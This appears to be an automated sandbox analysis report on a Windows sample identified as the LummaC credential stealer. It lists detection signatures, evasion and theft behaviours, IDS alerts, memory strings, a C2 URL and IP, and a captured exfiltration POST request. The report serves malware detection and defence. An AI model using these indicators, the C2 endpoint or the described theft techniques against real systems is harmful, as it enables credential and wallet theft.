Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1562727
MD5:	ae35cd7c9be6be3a150f903ddd1e411d
SHA1:	8ed830ee8e571e05afb58dd8755936eba832b72b
SHA256:	8be6a98bd5d89cf4adc715b3f0cd7914a47812086c13098f8bdb3fda1094b812
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 5380 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AE35CD7C9BE6BE3A150F903DDD1E411D)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://occupy-blushi.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1336629907.00000000007F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1336085175.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1383847377.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1310755085.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1311800277.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1359632994.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1359202911.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1386704934.00000000007F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1359393322.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5380	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 5380	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5380	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 7 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T23:34:09.636137+0100	2028371	3	Unknown Traffic	192.168.2.7	49700	172.67.187.240	443	TCP
2024-11-25T23:34:11.893067+0100	2028371	3	Unknown Traffic	192.168.2.7	49701	172.67.187.240	443	TCP
2024-11-25T23:34:14.795009+0100	2028371	3	Unknown Traffic	192.168.2.7	49703	172.67.187.240	443	TCP
2024-11-25T23:34:17.179431+0100	2028371	3	Unknown Traffic	192.168.2.7	49709	172.67.187.240	443	TCP
2024-11-25T23:34:19.586552+0100	2028371	3	Unknown Traffic	192.168.2.7	49715	172.67.187.240	443	TCP
2024-11-25T23:34:22.211547+0100	2028371	3	Unknown Traffic	192.168.2.7	49721	172.67.187.240	443	TCP
2024-11-25T23:34:25.491950+0100	2028371	3	Unknown Traffic	192.168.2.7	49729	172.67.187.240	443	TCP
2024-11-25T23:34:31.320567+0100	2028371	3	Unknown Traffic	192.168.2.7	49748	172.67.187.240	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T23:34:10.370759+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49700	172.67.187.240	443	TCP
2024-11-25T23:34:12.995666+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49701	172.67.187.240	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T23:34:10.370759+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49700	172.67.187.240	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T23:34:12.995666+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49701	172.67.187.240	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T23:34:15.807677+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49703	172.67.187.240	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T23:34:25.496812+0100	2843864	1	A Network Trojan was detected	192.168.2.7	49729	172.67.187.240	443	TCP

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: occupy-blushi.sbs

Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1491953508.00000000007DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microh
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1359535887.000000000553D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1491953508.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1492796351.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1494390752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1415146010.0000000000806000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1415016129.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://occupy-blushi.sbs/
Source: file.exe, 00000000.00000003.1491953508.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1492796351.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1494390752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://occupy-blushi.sbs/5
Source: file.exe, 00000000.00000003.1359202911.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1359393322.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1335705631.000000000080D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://occupy-blushi.sbs/api
Source: file.exe, 00000000.00000002.1494469265.0000000000805000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432900868.0000000000804000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432784543.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://occupy-blushi.sbs/api46k
Source: file.exe, 00000000.00000002.1494469265.0000000000805000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432900868.0000000000804000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1415146010.0000000000806000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432784543.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1415016129.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://occupy-blushi.sbs/api?k
Source: file.exe, 00000000.00000003.1383847377.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://occupy-blushi.sbs/apie
Source: file.exe, 00000000.00000003.1491953508.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1492796351.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1494390752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://occupy-blushi.sbs/apintel
Source: file.exe, 00000000.00000003.1360495340.000000000575C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1360495340.000000000575C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1311823430.0000000005479000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311582608.000000000547B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1311679121.0000000005479000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1360495340.000000000575C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: file.exe, 00000000.00000003.1360495340.000000000575C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000000.00000003.1360495340.000000000575C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: file.exe, 00000000.00000003.1360495340.000000000575C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1360495340.000000000575C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 172.67.187.240:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.240:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.240:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.240:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.240:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.240:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.240:443 -> 192.168.2.7:49729 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACE16C	0_2_00ACE16C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC83C0	0_2_00AC83C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABC4D7	0_2_00ABC4D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC8690	0_2_00AC8690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD07C0	0_2_00AD07C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9EAEB	0_2_00A9EAEB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABCD4F	0_2_00ABCD4F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACAF20	0_2_00ACAF20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD11B0	0_2_00AD11B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA151A	0_2_00AA151A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9D69D	0_2_00A9D69D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB3730	0_2_00AB3730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAF700	0_2_00AAF700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9B890	0_2_00A9B890
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB19C0	0_2_00AB19C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9DBE5	0_2_00A9DBE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AFE0AD	0_2_00AFE0AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3C0B4	0_2_00B3C0B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7C0A1	0_2_00B7C0A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC20AA	0_2_00BC20AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6008D	0_2_00B6008D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA80D3	0_2_00BA80D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B860D2	0_2_00B860D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B460CC	0_2_00B460CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A960D0	0_2_00A960D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCA038	0_2_00BCA038
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB0035	0_2_00BB0035
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF4023	0_2_00BF4023
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7601F	0_2_00B7601F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B20019	0_2_00B20019
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B64001	0_2_00B64001
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B04074	0_2_00B04074
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9207D	0_2_00B9207D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4C07E	0_2_00B4C07E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFA059	0_2_00BFA059
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2C05C	0_2_00B2C05C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1A1BD	0_2_00B1A1BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B361A5	0_2_00B361A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE0194	0_2_00BE0194
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB2189	0_2_00BB2189
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC4188	0_2_00BC4188
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBE18E	0_2_00BBE18E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDA186	0_2_00BDA186
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC01F3	0_2_00BC01F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF61F0	0_2_00BF61F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCC1DA	0_2_00BCC1DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9A1C0	0_2_00A9A1C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD01D4	0_2_00BD01D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAE1D0	0_2_00AAE1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF61D3	0_2_00AF61D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9C138	0_2_00B9C138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B66134	0_2_00B66134
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3213C	0_2_00B3213C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0015B	0_2_00C0015B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEE11F	0_2_00BEE11F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCE108	0_2_00BCE108
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF2108	0_2_00BF2108
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9E161	0_2_00B9E161
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A92170	0_2_00A92170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF8147	0_2_00AF8147
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B0E15D	0_2_00B0E15D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD414C	0_2_00BD414C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF814E	0_2_00BF814E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFE14E	0_2_00BFE14E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9614B	0_2_00B9614B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1014C	0_2_00B1014C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE62AB	0_2_00BE62AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBA298	0_2_00BBA298
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA629D	0_2_00BA629D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2029C	0_2_00B2029C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEC280	0_2_00BEC280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB42E2	0_2_00AB42E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4A2E6	0_2_00B4A2E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B822EB	0_2_00B822EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5422F	0_2_00B5422F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC020C	0_2_00AC020C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAA21B	0_2_00BAA21B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9E218	0_2_00A9E218
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B52200	0_2_00B52200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1C206	0_2_00B1C206
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2E20C	0_2_00B2E20C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B74208	0_2_00B74208
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDE202	0_2_00BDE202
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF227C	0_2_00BF227C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC8265	0_2_00BC8265
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B90262	0_2_00B90262
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2226E	0_2_00B2226E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3826F	0_2_00B3826F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6274	0_2_00AA6274
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2626D	0_2_00B2626D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B0A240	0_2_00B0A240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3E24A	0_2_00B3E24A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B48248	0_2_00B48248
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C003C3	0_2_00C003C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA8385	0_2_00AA8385
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE438E	0_2_00BE438E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD2381	0_2_00BD2381
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB63F3	0_2_00BB63F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B063FD	0_2_00B063FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B943E9	0_2_00B943E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B883EF	0_2_00B883EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B183EF	0_2_00B183EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A9C3D4	0_2_00A9C3D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB8328	0_2_00AB8328
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B84330	0_2_00B84330
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B58325	0_2_00B58325
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9E30D	0_2_00B9E30D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B92305	0_2_00B92305
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B52372	0_2_00B52372
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B56372	0_2_00B56372
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B02379	0_2_00B02379
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC2360	0_2_00AC2360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2C37D	0_2_00B2C37D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE636E	0_2_00BE636E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC636E	0_2_00BC636E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3A365	0_2_00B3A365
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8C36F	0_2_00B8C36F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF64BE	0_2_00BF64BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA04B3	0_2_00BA04B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B304B8	0_2_00B304B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5A4AD	0_2_00B5A4AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF648D	0_2_00AF648D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4C48C	0_2_00B4C48C
